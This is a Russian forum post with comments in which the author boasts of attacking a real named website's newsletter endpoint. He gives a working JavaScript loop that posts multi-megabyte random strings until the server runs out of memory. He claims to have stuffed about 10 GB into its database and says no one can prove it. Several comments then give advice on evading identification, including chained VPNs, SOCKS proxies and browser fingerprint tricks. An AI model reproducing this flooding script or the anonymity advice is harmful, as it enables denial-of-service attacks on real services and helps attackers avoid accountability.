7244

Шлём `Привет` кэшбери

Вижу пост

Не долго парясь нахожу в интернете их сайт http://gdc.group


Ооокей... Смотрим что там и как. И оказывается что фильтр почты, которую к ним на рассылку можно закинуть - фиктивный. Те если отправить руками то можно записать что угодно.


http://gdc.group/files/action/ajax.php?email=1


Методом перебора узнаём что под поле почты выделено 32милиионов(2^25) символов строка... А это 32 мегабайта.


Пишем небольшой скрипт


i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();

Хотя на деле лучше степень 20 гдето, потому как на лимите там памяти не хватает.


Ну и итого всё..) Память у сервиса кончилась, удачи разрабам разгребать говно и фиксить дыры..)

Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась... Если ребутнут не пофиксив, продолжим...


Такие успешные парни, а найти разраба не из студентов не смогли =\


Теперь всегда так:

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 4304128 bytes) in /home/bitrix/ext_www/gdc.group/files/action/ajax.php on line 8

Ещё и битрикс... Фи...

Вы смотрите срез комментариев. Показать все
121
Автор поста оценил этот комментарий

А потом на топикстартера подают в суд за умышленное нарушение работы сервиса и вешают всю упущенную "прибыль" :Р

раскрыть ветку (43)
83
Автор поста оценил этот комментарий

Кто подаст- то? Организация зарегистрированная в офшорах чтоли? Да и на кого? Ты сначала ТСа идентифицируй и найди, а уж потом подавай :)

раскрыть ветку (38)
100
Автор поста оценил этот комментарий

Бля, на самом деле это не трудно, но на деле касательно этого никто париться не будет, да и ущерба я не нанёс особо, а если что серьезнее пойдет, там я уже рассказывать не буду, да и хрен кто докажет)

раскрыть ветку (30)
32
Автор поста оценил этот комментарий

Я решил проверить насколько не сложно.

Ты меня просто поразил, гугл разве что ключи от квартиры мне не выдал.

раскрыть ветку (20)
18
Автор поста оценил этот комментарий

Лично меня найти достаточно легко..)

раскрыть ветку (19)
24
Автор поста оценил этот комментарий

Да, Серёг, ты бы это, чуть поанонимнее ники придумывай) Велосипеды и путешествия это конечно хорошо, но надо немного больше фантазии )))

раскрыть ветку (18)
27
Автор поста оценил этот комментарий

Анонимнее ник - это когда мне нужна анонимность. Тут мне не нужна анонимность.

раскрыть ветку (16)
7
Автор поста оценил этот комментарий

москва, 3-я улица строителей, 26

раскрыть ветку (13)
3
Автор поста оценил этот комментарий
@ser60v, это правда?
раскрыть ветку (12)
29
Автор поста оценил этот комментарий

У меня есть сайт. Который, о хоспади ищется по нику моему ) Там есть все мои контакты)

Более того я хожу регулярно на тренировки в одни и теже места..)

раскрыть ветку (11)
31
Автор поста оценил этот комментарий

Товарищ майор, успели записать?

Иллюстрация к комментарию
раскрыть ветку (6)
9
Автор поста оценил этот комментарий

По-хорошему надо чтоб за тобой сейчас не ФСБ выехало, а какая-нибудь нормальная девушка с минимальным содержанием тараканов.

По себе знаю, депрессия - занятие ниже среднего. В жизни столько веселой херни происходит, а ты сидишь в углу и смотришь внутрь себя, серый, апатичный и ничего не хотящий. Выбирайся.

2
Автор поста оценил этот комментарий
При открытии меню чуть-чуть верстка съезжает, влом чинить или не знал?
Иллюстрация к комментарию
Иллюстрация к комментарию
раскрыть ветку (1)
0
Автор поста оценил этот комментарий
На скрине не видно почти, там пара мм
0
Автор поста оценил этот комментарий

Поможем скрыться от преследования, затереть все данные преступления и начать новую жизнь в Канаде, попивая кленовый сироп и потрахивая бобров.

Обращайтесь 8-800-555-35-35

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Я в деле!

1
Автор поста оценил этот комментарий

Ты меня сейчас напугал прям. Потом только понял, что речь о ТС.

0
Автор поста оценил этот комментарий

Транканут табличку или просто DELETE WHERE id>100500

0
Автор поста оценил этот комментарий

А на самом деле нервишки-то уже поднатягиваются :)

0
Автор поста оценил этот комментарий

Дружище, недооценивай странность работы наших органов в сфере ИТ. Ты прав, что просто так никто искать не будет, нах не надо. Но если вдруг кто то из этих олухов занесет куда надо пару лямов (а денег у них хватает), ты можешь очень внезапно приехать. И да, ты наверно рассчитываешь пойти в отказ и в "не докажете". Так вот доказывать никто ничего не будет. Ты сам во всем признаешься ) Почитай историю Паши Врублевского (гуглится легко). Может впредь поменьше будет желаний хвастаться такими подвигами на весь инет )

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Если бы было не западло занести пару лямов - занесли бы пару тыщ прогеру. Там сделать нормально минут 5 просто недо не быть ебланом.

То что сделали - это просто феерическое ебланство. Это не по незнанию сделали, а по причине того что в голове дурь.

0
Автор поста оценил этот комментарий
Развели тут демагогию. Ни один вменяемый мошенник не будет обращаться в судебные инстанции, особенно если с него есть что стрясти. Второй цикл аферы начался потому, что после первого не было судебного преследования. Пока за яйца не прихватят - не успокоятся. Это же всё очевидно.
0
DELETED
Автор поста оценил этот комментарий

дабл опен-впн + сокс.... думаю, ты и без меня знаешь, как сделаться невидимым для поиска)

раскрыть ветку (3)
3
Автор поста оценил этот комментарий

Не забыть что все впнки и прокси должны быть тоже анонимными(т.е. зареганы не на тебя и твоего упоминания там не должно быть), еще сменить локализацию браузера, местоположение, размер окна,user agent. и ОС под двумя виртуалками с шифрованной виртуальной сетью между ними. А виртуалки на шифрованном виртуальном диске на малинке которая у тебя в кармане, чтоб если что закинуть в микроволновку и сжечь после.

раскрыть ветку (2)
0
Автор поста оценил этот комментарий
А что, так можно было? Я на ардуине делал....
0
DELETED
Автор поста оценил этот комментарий

ну, эт ты уже сильно загоняешься, как по мне) впн, естесна, должны быть покупными абузоустойчивыми. Для ОС, мне сдается, хватит и одной виртуалки с чужой локализацией. А вот насчет размера окна браузера я бы мог и пообсуждать. Разрешение экрана 1280*1024 и браузер в полноэкранном режиме есть у кучи народа. А вот браузер в разрешении 1152*1011 делает слепок твоей системы почти уникальным с первого же параметра. Да и шифрованного контейнера на шифрованном разделе обычной флешки (truecrypt + drivecrypt с разными алгоритмами), как мне видится, вполне достаточно))

7
Автор поста оценил этот комментарий

Деанонить пикабушника у ментов получится на раз два.

Сам лично видел такой документ во связи со скандалом одной из школ на западе подмосковья. На пикабу про это есть

раскрыть ветку (4)
2
Автор поста оценил этот комментарий
Я тут постою линк подожду.
ещё комментарии
0
Автор поста оценил этот комментарий

Найти, индефицировать, слепить дело и посадить - элементарно, были бы деньги. А у кэшбери они , я подозреваю есть.

раскрыть ветку (1)
0
Автор поста оценил этот комментарий

Эх. Было бы за что искать)

ещё комментарии
Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку